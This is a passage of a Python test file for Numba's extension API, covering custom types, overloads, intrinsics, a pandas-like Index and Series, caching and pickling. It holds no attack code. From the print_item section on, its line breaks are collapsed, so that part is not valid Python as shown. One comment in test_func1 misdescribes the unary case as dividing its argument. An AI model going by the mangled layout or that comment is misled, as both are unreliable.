    ConcreteTemplate,
    signature,
    infer,
    infer_global,
    AbstractTemplate,
)

# Pandas-like API implementation
from .pdlike_usecase import Index, Series

# scipy's cython_special bindings only exist from scipy 0.19 on; `sc` stays
# None when scipy is absent or too old, and tests guard on that.
try:
    import scipy

    if LooseVersion(scipy.__version__) < "0.19":
        sc = None
    else:
        import scipy.special.cython_special as sc
except ImportError:
    sc = None


# -----------------------------------------------------------------------
# Define a custom type and an implicit cast on it


class MyDummy(object):
    # Plain Python marker class; its numba type is MyDummyType below.
    pass


class MyDummyType(types.Opaque):
    def can_convert_to(self, context, toty):
        """Allow an implicit (safe) conversion to any Number type.

        Returning None (the implicit fall-through for non-Number targets)
        means "no conversion available".
        """
        if isinstance(toty, types.Number):
            from numba.core.typeconv import Conversion

            return Conversion.safe


# Singleton type instance and a sample Python-level value of that type.
mydummy_type = MyDummyType("mydummy")
mydummy = MyDummy()


@typeof_impl.register(MyDummy)
def typeof_mydummy(val, c):
    # Map Python MyDummy instances to the mydummy_type numba type.
    return mydummy_type


@lower_cast(MyDummyType, types.Number)
def mydummy_to_number(context, builder, fromty, toty, val):
    """
    Implicit conversion from MyDummy to int.
    """
    # The cast always produces the constant 42, whatever the target type.
    return context.get_constant(toty, 42)


def get_dummy():
    """Return the module-level MyDummy sample value."""
    return mydummy


# MyDummyType carries no data, so an opaque data model suffices.
register_model(MyDummyType)(models.OpaqueModel)


@unbox(MyDummyType)
def unbox_index(typ, obj, c):
    # Nothing to extract from the Python object: use a dummy native value.
    return NativeValue(c.context.get_dummy_value())


# -----------------------------------------------------------------------
# Define a second custom type but w/o implicit cast to Number


def base_dummy_type_factory(name):
    """Create and register a fresh opaque dummy type.

    Returns (type class, Python class, type instance) for the given `name`.
    """

    class DynType(object):
        pass

    class DynTypeType(types.Opaque):
        pass

    dyn_type_type = DynTypeType(name)

    @typeof_impl.register(DynType)
    def typeof_mydummy(val, c):
        return dyn_type_type

    register_model(DynTypeType)(models.OpaqueModel)
    return DynTypeType, DynType, dyn_type_type


MyDummyType2, MyDummy2, mydummy_type_2 = base_dummy_type_factory("mydummy2")


@unbox(MyDummyType2)
def unbox_index2(typ, obj, c):
    # Same opaque unboxing as MyDummyType: no payload to carry over.
    return NativeValue(c.context.get_dummy_value())


# -----------------------------------------------------------------------
# Define a function's typing and implementation using the classical
# two-step API


def func1(x=None):
    # Pure-Python placeholder; the real behavior is supplied by the
    # lower_builtin implementations below.
    raise NotImplementedError


def type_func1_(context):
    """Typing half of the two-step API: pick a signature for func1."""

    def typer(x=None):
        if x in (None, types.none):
            # 0-arg or 1-arg with None
            return types.int32
        elif isinstance(x, types.Float):
            # 1-arg with float
            return x

    return typer


type_func1 = type_callable(func1)(type_func1_)


@lower_builtin(func1)
@lower_builtin(func1, types.none)
def func1_nullary(context, builder, sig, args):
    # Lowering for func1() and func1(None): constant 42.
    return context.get_constant(sig.return_type, 42)


@lower_builtin(func1, types.Float)
def func1_unary(context, builder, sig, args):
    # Lowering for func1(float): sqrt(2 * x), compiled through numba itself.
    def func1_impl(x):
        return math.sqrt(2 * x)

    return context.compile_internal(builder, func1_impl, sig, args)


# We can do the same for a known internal operation, here "print_item"
# which we extend to support MyDummyType.
@infer class PrintDummy(ConcreteTemplate): key = "print_item" cases = [signature(types.none, mydummy_type)] @lower_builtin("print_item", MyDummyType) def print_dummy(context, builder, sig, args): [x] = args pyapi = context.get_python_api(builder) strobj = pyapi.unserialize(pyapi.serialize_object("hello!")) pyapi.print_object(strobj) pyapi.decref(strobj) return context.get_dummy_value() # ----------------------------------------------------------------------- # Define an overloaded function (combined API) def where(cond, x, y): raise NotImplementedError def np_where(cond, x, y): """ Wrap np.where() to allow for keyword arguments """ return np.where(cond, x, y) def call_where(cond, x, y): return where(cond, y=y, x=x) @overload(where) def overload_where_arrays(cond, x, y): """ Implement where() for arrays. """ # Choose implementation based on argument types. if isinstance(cond, types.Array): if x.dtype != y.dtype: raise errors.TypingError("x and y should have the same dtype") # Array where() => return an array of the same shape if all(ty.layout == "C" for ty in (cond, x, y)): def where_impl(cond, x, y): """ Fast implementation for C-contiguous arrays """ shape = cond.shape if x.shape != shape or y.shape != shape: raise ValueError("all inputs should have the same shape") res = np.empty_like(x) cf = cond.flat xf = x.flat yf = y.flat rf = res.flat for i in range(cond.size): rf[i] = xf[i] if cf[i] else yf[i] return res else: def where_impl(cond, x, y): """ Generic implementation for other arrays """ shape = cond.shape if x.shape != shape or y.shape != shape: raise ValueError("all inputs should have the same shape") res = np.empty_like(x) for idx, c in np.ndenumerate(cond): res[idx] = x[idx] if c else y[idx] return res return where_impl # We can define another overload function for the same function, they # will be tried in turn until one succeeds. @overload(where) def overload_where_scalars(cond, x, y): """ Implement where() for scalars. 
""" if not isinstance(cond, types.Array): if x != y: raise errors.TypingError("x and y should have the same type") def where_impl(cond, x, y): """ Scalar where() => return a 0-dim array """ scal = x if cond else y # Can't use full_like() on Numpy < 1.8 arr = np.empty_like(scal) arr[()] = scal return arr return where_impl # ----------------------------------------------------------------------- # Overload an already defined built-in function, extending it for new types. @overload(len) def overload_len_dummy(arg): if isinstance(arg, MyDummyType): def len_impl(arg): return 13 return len_impl @overload(operator.add) def overload_add_dummy(arg1, arg2): if isinstance(arg1, (MyDummyType, MyDummyType2)) and isinstance( arg2, (MyDummyType, MyDummyType2) ): def dummy_add_impl(arg1, arg2): return 42 return dummy_add_impl @overload(operator.delitem) def overload_dummy_delitem(obj, idx): if isinstance(obj, MyDummyType) and isinstance(idx, types.Integer): def dummy_delitem_impl(obj, idx): print("del", obj, idx) return dummy_delitem_impl @overload(operator.getitem) def overload_dummy_getitem(obj, idx): if isinstance(obj, MyDummyType) and isinstance(idx, types.Integer): def dummy_getitem_impl(obj, idx): return idx + 123 return dummy_getitem_impl @overload(operator.setitem) def overload_dummy_setitem(obj, idx, val): if all( [ isinstance(obj, MyDummyType), isinstance(idx, types.Integer), isinstance(val, types.Integer), ] ): def dummy_setitem_impl(obj, idx, val): print(idx, val) return dummy_setitem_impl def call_add_operator(arg1, arg2): return operator.add(arg1, arg2) def call_add_binop(arg1, arg2): return arg1 + arg2 @overload(operator.iadd) def overload_iadd_dummy(arg1, arg2): if isinstance(arg1, (MyDummyType, MyDummyType2)) and isinstance( arg2, (MyDummyType, MyDummyType2) ): def dummy_iadd_impl(arg1, arg2): return 42 return dummy_iadd_impl def call_iadd_operator(arg1, arg2): return operator.add(arg1, arg2) def call_iadd_binop(arg1, arg2): arg1 += arg2 return arg1 def 
call_delitem(obj, idx): del obj[idx] def call_getitem(obj, idx): return obj[idx] def call_setitem(obj, idx, val): obj[idx] = val @overload_method(MyDummyType, "length") def overload_method_length(arg): def imp(arg): return len(arg) return imp def cache_overload_method_usecase(x): return x.length() def call_func1_nullary(): return func1() def call_func1_unary(x): return func1(x) def len_usecase(x): return len(x) def print_usecase(x): print(x) def getitem_usecase(x, key): return x[key] def npyufunc_usecase(x): return np.cos(np.sin(x)) def get_data_usecase(x): return x._data def get_index_usecase(x): return x._index def is_monotonic_usecase(x): return x.is_monotonic_increasing def make_series_usecase(data, index): return Series(data, index) def clip_usecase(x, lo, hi): return x.clip(lo, hi) # ----------------------------------------------------------------------- def return_non_boxable(): return np @overload(return_non_boxable) def overload_return_non_boxable(): def imp(): return np return imp def non_boxable_ok_usecase(sz): mod = return_non_boxable() return mod.arange(sz) def non_boxable_bad_usecase(): return return_non_boxable() def mk_func_input(f): pass @infer_global(mk_func_input) class MkFuncTyping(AbstractTemplate): def generic(self, args, kws): assert isinstance(args[0], types.MakeFunctionLiteral) return signature(types.none, *args) def mk_func_test_impl(): mk_func_input(lambda a: a) # ----------------------------------------------------------------------- @overload(np.exp) def overload_np_exp(obj): if isinstance(obj, MyDummyType): def imp(obj): # Returns a constant if a MyDummyType is seen return 0xDEADBEEF return imp class TestLowLevelExtending(TestCase): """ Test the low-level two-tier extension API. """ # We check with both @jit and compile_isolated(), to exercise the # registration logic. 
    def test_func1(self):
        # func1 is overloaded through the two-tier API; check both the
        # nullary form (returns the constant 42) and the unary form
        # (divides its argument), compiled through the @jit dispatcher.
        pyfunc = call_func1_nullary
        cfunc = jit(nopython=True)(pyfunc)
        self.assertPreciseEqual(cfunc(), 42)
        pyfunc = call_func1_unary
        cfunc = jit(nopython=True)(pyfunc)
        self.assertPreciseEqual(cfunc(None), 42)
        self.assertPreciseEqual(cfunc(18.0), 6.0)

    def test_func1_isolated(self):
        # Same checks as test_func1, but via compile_isolated() to exercise
        # the registration logic without the dispatcher machinery.
        pyfunc = call_func1_nullary
        cr = compile_isolated(pyfunc, ())
        self.assertPreciseEqual(cr.entry_point(), 42)
        pyfunc = call_func1_unary
        cr = compile_isolated(pyfunc, (types.float64,))
        self.assertPreciseEqual(cr.entry_point(18.0), 6.0)

    def test_type_callable_keeps_function(self):
        # type_callable() must return the typing function it decorates.
        self.assertIs(type_func1, type_func1_)
        self.assertIsNotNone(type_func1)

    def test_cast_mydummy(self):
        # A MyDummy value must cast to float64 when used as the return type.
        pyfunc = get_dummy
        cr = compile_isolated(pyfunc, (), types.float64)
        self.assertPreciseEqual(cr.entry_point(), 42.0)

    def test_mk_func_literal(self):
        """make sure make_function is passed to typer class as a literal
        """
        test_ir = compiler.run_frontend(mk_func_test_impl)
        typingctx = cpu_target.typing_context
        targetctx = cpu_target.target_context
        typingctx.refresh()
        targetctx.refresh()
        typing_res = type_inference_stage(typingctx, targetctx, test_ir, (), None)
        # At least one value in the typemap must have been typed as a
        # MakeFunctionLiteral (the lambda passed to mk_func_input).
        self.assertTrue(
            any(
                isinstance(a, types.MakeFunctionLiteral)
                for a in typing_res.typemap.values()
            )
        )


class TestPandasLike(TestCase):
    """
    Test implementing a pandas-like Index object.
    Also stresses most of the high-level API.
    """

    def test_index_len(self):
        # len() forwards to the extension's length implementation.
        i = Index(np.arange(3))
        cfunc = jit(nopython=True)(len_usecase)
        self.assertPreciseEqual(cfunc(i), 3)

    def test_index_getitem(self):
        # Integer indexing returns a scalar; slicing returns a new Index.
        i = Index(np.int32([42, 8, -5]))
        cfunc = jit(nopython=True)(getitem_usecase)
        self.assertPreciseEqual(cfunc(i, 1), 8)
        ii = cfunc(i, slice(1, None))
        self.assertIsInstance(ii, Index)
        self.assertEqual(list(ii), [8, -5])

    def test_index_ufunc(self):
        """
        Check Numpy ufunc on an Index object.
        """
        i = Index(np.int32([42, 8, -5]))
        cfunc = jit(nopython=True)(npyufunc_usecase)
        ii = cfunc(i)
        self.assertIsInstance(ii, Index)
        self.assertPreciseEqual(ii._data, np.cos(np.sin(i._data)))

    def test_index_get_data(self):
        # The _data attribute is exposed with make_attribute_wrapper()
        i = Index(np.int32([42, 8, -5]))
        cfunc = jit(nopython=True)(get_data_usecase)
        data = cfunc(i)
        # Attribute access must return the very same array, not a copy.
        self.assertIs(data, i._data)

    def test_index_is_monotonic(self):
        # The is_monotonic_increasing attribute is exposed with
        # overload_attribute()
        cfunc = jit(nopython=True)(is_monotonic_usecase)
        # NOTE: an empty Index counts as monotonically increasing.
        for values, expected in [
            ([8, 42, 5], False),
            ([5, 8, 42], True),
            ([], True),
        ]:
            i = Index(np.int32(values))
            got = cfunc(i)
            self.assertEqual(got, expected)

    def test_series_len(self):
        # len() of a Series counts its values, like the Index case above.
        i = Index(np.int32([2, 4, 3]))
        s = Series(np.float64([1.5, 4.0, 2.5]), i)
        cfunc = jit(nopython=True)(len_usecase)
        self.assertPreciseEqual(cfunc(s), 3)

    def test_series_get_index(self):
        # The _index attribute round-trips as an Index sharing its data.
        i = Index(np.int32([2, 4, 3]))
        s = Series(np.float64([1.5, 4.0, 2.5]), i)
        cfunc = jit(nopython=True)(get_index_usecase)
        got = cfunc(s)
        self.assertIsInstance(got, Index)
        self.assertIs(got._data, i._data)

    def test_series_ufunc(self):
        """
        Check Numpy ufunc on an Series object.
""" i = Index(np.int32([42, 8, -5])) s = Series(np.int64([1, 2, 3]), i) cfunc = jit(nopython=True)(npyufunc_usecase) ss = cfunc(s) self.assertIsInstance(ss, Series) self.assertIsInstance(ss._index, Index) self.assertIs(ss._index._data, i._data) self.assertPreciseEqual(ss._values, np.cos(np.sin(s._values))) def test_series_constructor(self): i = Index(np.int32([42, 8, -5])) d = np.float64([1.5, 4.0, 2.5]) cfunc = jit(nopython=True)(make_series_usecase) got = cfunc(d, i) self.assertIsInstance(got, Series) self.assertIsInstance(got._index, Index) self.assertIs(got._index._data, i._data) self.assertIs(got._values, d) def test_series_clip(self): i = Index(np.int32([42, 8, -5])) s = Series(np.float64([1.5, 4.0, 2.5]), i) cfunc = jit(nopython=True)(clip_usecase) ss = cfunc(s, 1.6, 3.0) self.assertIsInstance(ss, Series) self.assertIsInstance(ss._index, Index) self.assertIs(ss._index._data, i._data) self.assertPreciseEqual(ss._values, np.float64([1.6, 3.0, 2.5])) class TestHighLevelExtending(TestCase): """ Test the high-level combined API. """ def test_where(self): """ Test implementing a function with @overload. """ pyfunc = call_where cfunc = jit(nopython=True)(pyfunc) def check(*args, **kwargs): expected = np_where(*args, **kwargs) got = cfunc(*args, **kwargs) self.assertPreciseEqual(expected, got) check(x=3, cond=True, y=8) check(True, 3, 8) check( np.bool_([True, False, True]), np.int32([1, 2, 3]), np.int32([4, 5, 5]), ) # The typing error is propagated with self.assertRaises(errors.TypingError) as raises: cfunc(np.bool_([]), np.int32([]), np.int64([])) self.assertIn( "x and y should have the same dtype", str(raises.exception) ) def test_len(self): """ Test re-implementing len() for a custom type with @overload. """ cfunc = jit(nopython=True)(len_usecase) self.assertPreciseEqual(cfunc(MyDummy()), 13) self.assertPreciseEqual(cfunc([4, 5]), 2) def test_print(self): """ Test re-implementing print() for a custom type with @overload. 
""" cfunc = jit(nopython=True)(print_usecase) with captured_stdout(): cfunc(MyDummy()) self.assertEqual(sys.stdout.getvalue(), "hello!\n") def test_add_operator(self): """ Test re-implementing operator.add() for a custom type with @overload. """ pyfunc = call_add_operator cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_add_binop(self): """ Test re-implementing '+' for a custom type via @overload(operator.add). """ pyfunc = call_add_binop cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_iadd_operator(self): """ Test re-implementing operator.add() for a custom type with @overload. """ pyfunc = call_iadd_operator cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_iadd_binop(self): """ Test re-implementing '+' for a custom type via @overload(operator.add). 
""" pyfunc = call_iadd_binop cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(1, 2), 3) self.assertPreciseEqual(cfunc(MyDummy2(), MyDummy2()), 42) # this will call add(Number, Number) as MyDummy implicitly casts to # Number self.assertPreciseEqual(cfunc(MyDummy(), MyDummy()), 84) def test_delitem(self): pyfunc = call_delitem cfunc = jit(nopython=True)(pyfunc) obj = MyDummy() e = None with captured_stdout() as out: try: cfunc(obj, 321) except Exception as exc: e = exc if e is not None: raise e self.assertEqual(out.getvalue(), "del hello! 321\n") def test_getitem(self): pyfunc = call_getitem cfunc = jit(nopython=True)(pyfunc) self.assertPreciseEqual(cfunc(MyDummy(), 321), 321 + 123) def test_setitem(self): pyfunc = call_setitem cfunc = jit(nopython=True)(pyfunc) obj = MyDummy() e = None with captured_stdout() as out: try: cfunc(obj, 321, 123) except Exception as exc: e = exc if e is not None: raise e self.assertEqual(out.getvalue(), "321 123\n") def test_no_cpython_wrapper(self): """ Test overloading whose return value cannot be represented in CPython. """ # Test passing Module type from a @overload implementation to ensure # that the *no_cpython_wrapper* flag works ok_cfunc = jit(nopython=True)(non_boxable_ok_usecase) n = 10 got = ok_cfunc(n) expect = non_boxable_ok_usecase(n) np.testing.assert_equal(expect, got) # Verify that the Module type cannot be returned to CPython bad_cfunc = jit(nopython=True)(non_boxable_bad_usecase) with self.assertRaises(TypeError) as raises: bad_cfunc() errmsg = str(raises.exception) expectmsg = "cannot convert native Module" self.assertIn(expectmsg, errmsg) def test_typing_vs_impl_signature_mismatch_handling(self): """ Tests that an overload which has a differing typing and implementing signature raises an exception. 
""" def gen_ol(impl=None): def myoverload(a, b, c, kw=None): pass @overload(myoverload) def _myoverload_impl(a, b, c, kw=None): return impl @jit(nopython=True) def foo(a, b, c, d): myoverload(a, b, c, kw=d) return foo sentinel = "Typing and implementation arguments differ in" # kwarg value is different def impl1(a, b, c, kw=12): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl1)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument default values", msg) self.assertIn('<Parameter "kw=12">', msg) self.assertIn('<Parameter "kw=None">', msg) # kwarg name is different def impl2(a, b, c, kwarg=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl2)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "kwarg=None">', msg) self.assertIn('<Parameter "kw=None">', msg) # arg name is different def impl3(z, b, c, kw=None): if a > 10: # noqa: F821 return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl3)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "a">', msg) self.assertIn('<Parameter "z">', msg) from .overload_usecases import impl4, impl5 with self.assertRaises(errors.TypingError) as e: gen_ol(impl4)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn("First difference: 'z'", msg) with self.assertRaises(errors.TypingError) as e: gen_ol(impl5)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "a">', msg) self.assertIn('<Parameter "z">', msg) # too many args def impl6(a, b, c, d, e, kw=None): if a > 10: return 
1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl6)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "d">', msg) self.assertIn('<Parameter "e">', msg) # too few args def impl7(a, b, kw=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl7)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("argument names", msg) self.assertFalse("keyword" in msg) self.assertIn('<Parameter "c">', msg) # too many kwargs def impl8(a, b, c, kw=None, extra_kwarg=None): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl8)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "extra_kwarg=None">', msg) # too few kwargs def impl9(a, b, c): if a > 10: return 1 else: return -1 with self.assertRaises(errors.TypingError) as e: gen_ol(impl9)(1, 2, 3, 4) msg = str(e.exception) self.assertIn(sentinel, msg) self.assertIn("keyword argument names", msg) self.assertIn('<Parameter "kw=None">', msg) def test_typing_vs_impl_signature_mismatch_handling_var_positional(self): """ Tests that an overload which has a differing typing and implementing signature raises an exception and uses VAR_POSITIONAL (*args) in typing """ def myoverload(a, kw=None): pass from .overload_usecases import var_positional_impl overload(myoverload)(var_positional_impl) @jit(nopython=True) def foo(a, b): return myoverload(a, b, 9, kw=11) with self.assertRaises(errors.TypingError) as e: foo(1, 5) msg = str(e.exception) self.assertIn("VAR_POSITIONAL (e.g. 
*args) argument kind", msg) self.assertIn("offending argument name is '*star_args_token'", msg) def test_typing_vs_impl_signature_mismatch_handling_var_keyword(self): """ Tests that an overload which uses **kwargs (VAR_KEYWORD) """ def gen_ol(impl, strict=True): def myoverload(a, kw=None): pass overload(myoverload, strict=strict)(impl) @jit(nopython=True) def foo(a, b): return myoverload(a, kw=11) return foo # **kwargs in typing def ol1(a, **kws): def impl(a, kw=10): return a return impl gen_ol(ol1, False)(1, 2) # no error if strictness not enforced with self.assertRaises(errors.TypingError) as e: gen_ol(ol1)(1, 2) msg = str(e.exception) self.assertIn("use of VAR_KEYWORD (e.g. **kwargs) is unsupported", msg) self.assertIn("offending argument name is '**kws'", msg) # **kwargs in implementation def ol2(a, kw=0): def impl(a, **kws): return a return impl with self.assertRaises(errors.TypingError) as e: gen_ol(ol2)(1, 2) msg = str(e.exception) self.assertIn("use of VAR_KEYWORD (e.g. **kwargs) is unsupported", msg) self.assertIn("offending argument name is '**kws'", msg) def test_overload_method_kwargs(self): # Issue #3489 @overload_method(types.Array, "foo") def fooimpl(arr, a_kwarg=10): def impl(arr, a_kwarg=10): return a_kwarg return impl @njit def bar(A): return A.foo(), A.foo(20), A.foo(a_kwarg=30) Z = np.arange(5) self.assertEqual(bar(Z), (10, 20, 30)) def test_overload_method_literal_unpack(self): # Issue #3683 @overload_method(types.Array, "litfoo") def litfoo(arr, val): # Must be an integer if isinstance(val, types.Integer): # Must not be literal if not isinstance(val, types.Literal): def impl(arr, val): return val return impl @njit def bar(A): return A.litfoo(0xCAFE) A = np.zeros(1) bar(A) self.assertEqual(bar(A), 0xCAFE) def test_overload_ufunc(self): # Issue #4133. # Use an extended type (MyDummyType) to use with a customized # ufunc (np.exp). 
@njit def test(): return np.exp(mydummy) self.assertEqual(test(), 0xDEADBEEF) def test_overload_method_stararg(self): @overload_method(MyDummyType, "method_stararg") def _ov_method_stararg(obj, val, val2, *args): def get(obj, val, val2, *args): return (val, val2, args) return get @njit def foo(obj, *args): # Test with expanding stararg return obj.method_stararg(*args) obj = MyDummy() self.assertEqual(foo(obj, 1, 2), (1, 2, ())) self.assertEqual(foo(obj, 1, 2, 3), (1, 2, (3,))) self.assertEqual(foo(obj, 1, 2, 3, 4), (1, 2, (3, 4))) @njit def bar(obj): # Test with explicit argument return ( obj.method_stararg(1, 2), obj.method_stararg(1, 2, 3), obj.method_stararg(1, 2, 3, 4), ) self.assertEqual( bar(obj), ((1, 2, ()), (1, 2, (3,)), (1, 2, (3, 4))), ) # Check cases that put tuple type into stararg # NOTE: the expected result has an extra tuple because of stararg. self.assertEqual( foo(obj, 1, 2, (3,)), (1, 2, ((3,),)), ) self.assertEqual( foo(obj, 1, 2, (3, 4)), (1, 2, ((3, 4),)), ) self.assertEqual( foo(obj, 1, 2, (3, (4, 5))), (1, 2, ((3, (4, 5)),)), ) def _assert_cache_stats(cfunc, expect_hit, expect_misses): hit = cfunc._cache_hits[cfunc.signatures[0]] if hit != expect_hit: raise AssertionError("cache not used") miss = cfunc._cache_misses[cfunc.signatures[0]] if miss != expect_misses: raise AssertionError("cache not used") class TestOverloadMethodCaching(TestCase): # Nested multiprocessing.Pool raises AssertionError: # "daemonic processes are not allowed to have children" _numba_parallel_test_ = False def test_caching_overload_method(self): self._cache_dir = temp_directory(self.__class__.__name__) with override_config("CACHE_DIR", self._cache_dir): self.run_caching_overload_method() def run_caching_overload_method(self): cfunc = jit(nopython=True, cache=True)(cache_overload_method_usecase) self.assertPreciseEqual(cfunc(MyDummy()), 13) _assert_cache_stats(cfunc, 0, 1) llvmir = cfunc.inspect_llvm((mydummy_type,)) # Ensure the inner method is not a declaration decls 
= [ ln for ln in llvmir.splitlines() if ln.startswith("declare") and "overload_method_length" in ln ] self.assertEqual(len(decls), 0) # Test in a separate process try: ctx = multiprocessing.get_context("spawn") except AttributeError: ctx = multiprocessing q = ctx.Queue() p = ctx.Process( target=run_caching_overload_method, args=(q, self._cache_dir) ) p.start() q.put(MyDummy()) p.join() # Ensure subprocess exited normally self.assertEqual(p.exitcode, 0) res = q.get(timeout=1) self.assertEqual(res, 13) def run_caching_overload_method(q, cache_dir): """ Used by TestOverloadMethodCaching.test_caching_overload_method """ with override_config("CACHE_DIR", cache_dir): arg = q.get() cfunc = jit(nopython=True, cache=True)(cache_overload_method_usecase) res = cfunc(arg) q.put(res) # Check cache stat _assert_cache_stats(cfunc, 1, 0) class TestIntrinsic(TestCase): def test_void_return(self): """ Verify that returning a None from codegen function is handled automatically for void functions, otherwise raise exception. 
""" @intrinsic def void_func(typingctx, a): sig = types.void(types.int32) def codegen(context, builder, signature, args): pass # do nothing, return None, should be turned into # dummy value return sig, codegen @intrinsic def non_void_func(typingctx, a): sig = types.int32(types.int32) def codegen(context, builder, signature, args): pass # oops, should be returning a value here, raise exception return sig, codegen @jit(nopython=True) def call_void_func(): void_func(1) return 0 @jit(nopython=True) def call_non_void_func(): non_void_func(1) return 0 # void func should work self.assertEqual(call_void_func(), 0) # not void function should raise exception with self.assertRaises(LoweringError) as e: call_non_void_func() self.assertIn("non-void function returns None", e.exception.msg) def test_ll_pointer_cast(self): """ Usecase test: custom reinterpret cast to turn int values to pointers """ from ctypes import CFUNCTYPE, POINTER, c_float, c_int # Use intrinsic to make a reinterpret_cast operation def unsafe_caster(result_type): assert isinstance(result_type, types.CPointer) @intrinsic def unsafe_cast(typingctx, src): self.assertIsInstance(typingctx, typing.Context) if isinstance(src, types.Integer): sig = result_type(types.uintp) # defines the custom code generation def codegen(context, builder, signature, args): [src] = args rtype = signature.return_type llrtype = context.get_value_type(rtype) return builder.inttoptr(src, llrtype) return sig, codegen return unsafe_cast # make a nopython function to use our cast op. # this is not usable from cpython due to the returning of a pointer. 
def unsafe_get_ctypes_pointer(src): raise NotImplementedError("not callable from python") @overload(unsafe_get_ctypes_pointer, strict=False) def array_impl_unsafe_get_ctypes_pointer(arrtype): if isinstance(arrtype, types.Array): unsafe_cast = unsafe_caster(types.CPointer(arrtype.dtype)) def array_impl(arr): return unsafe_cast(src=arr.ctypes.data) return array_impl # the ctype wrapped function for use in nopython mode def my_c_fun_raw(ptr, n): for i in range(n): print(ptr[i]) prototype = CFUNCTYPE(None, POINTER(c_float), c_int) my_c_fun = prototype(my_c_fun_raw) # Call our pointer-cast in a @jit compiled function and use # the pointer in a ctypes function @jit(nopython=True) def foo(arr): ptr = unsafe_get_ctypes_pointer(arr) my_c_fun(ptr, arr.size) # Test arr = np.arange(10, dtype=np.float32) with captured_stdout() as buf: foo(arr) got = buf.getvalue().splitlines() buf.close() expect = list(map(str, arr)) self.assertEqual(expect, got) def test_serialization(self): """ Test serialization of intrinsic objects """ # define a intrinsic @intrinsic def identity(context, x): def codegen(context, builder, signature, args): return args[0] sig = x(x) return sig, codegen # use in a jit function @jit(nopython=True) def foo(x): return identity(x) self.assertEqual(foo(1), 1) # get serialization memo memo = _Intrinsic._memo memo_size = len(memo) # pickle foo and check memo size serialized_foo = pickle.dumps(foo) # increases the memo size memo_size += 1 self.assertEqual(memo_size, len(memo)) # unpickle foo_rebuilt = pickle.loads(serialized_foo) self.assertEqual(memo_size, len(memo)) # check rebuilt foo self.assertEqual(foo(1), foo_rebuilt(1)) # pickle identity directly serialized_identity = pickle.dumps(identity) # memo size unchanged self.assertEqual(memo_size, len(memo)) # unpickle identity_rebuilt = pickle.loads(serialized_identity) # must be the same object self.assertIs(identity, identity_rebuilt) # memo size unchanged self.assertEqual(memo_size, len(memo)) def 
test_deserialization(self): """ Test deserialization of intrinsic """ def defn(context, x): def codegen(context, builder, signature, args): return args[0] return x(x), codegen memo = _Intrinsic._memo memo_size = len(memo) # invoke _Intrinsic indirectly to avoid registration which keeps an # internal reference inside the compiler original = _Intrinsic("foo", defn) self.assertIs(original._defn, defn) pickled = pickle.dumps(original) # by pickling, a new memo entry is created memo_size += 1 self.assertEqual(memo_size, len(memo)) del original # remove original before unpickling # by deleting, the memo entry is NOT removed due to recent # function queue self.assertEqual(memo_size, len(memo)) # Manually force clear of _recent queue _Intrinsic._recent.clear() memo_size -= 1 self.assertEqual(memo_size, len(memo)) rebuilt = pickle.loads(pickled) # verify that the rebuilt object is different self.assertIsNot(rebuilt._defn, defn) # the second rebuilt object is the same as the first second = pickle.loads(pickled) self.assertIs(rebuilt._defn, second._defn) def test_docstring(self): @intrinsic def void_func(typingctx, a: int): """void_func docstring""" sig = types.void(types.int32) def codegen(context, builder, signature, args): pass # do nothing, return None, should be turned into # dummy value return sig, codegen self.assertEqual("numba.tests.test_extending", void_func.__module__) self.assertEqual("void_func", void_func.__name__) self.assertEqual("TestIntrinsic.test_docstring.<locals>.void_func", void_func.__qualname__) self.assertDictEqual({'a': int}, void_func.__annotations__) self.assertEqual("void_func docstring", void_func.__doc__) class TestRegisterJitable(unittest.TestCase): def test_no_flags(self): @register_jitable def foo(x, y): return x + y def bar(x, y): return foo(x, y) cbar = jit(nopython=True)(bar) expect = bar(1, 2) got = cbar(1, 2) self.assertEqual(expect, got) def test_flags_no_nrt(self): @register_jitable(_nrt=False) def foo(n): return np.arange(n) def 
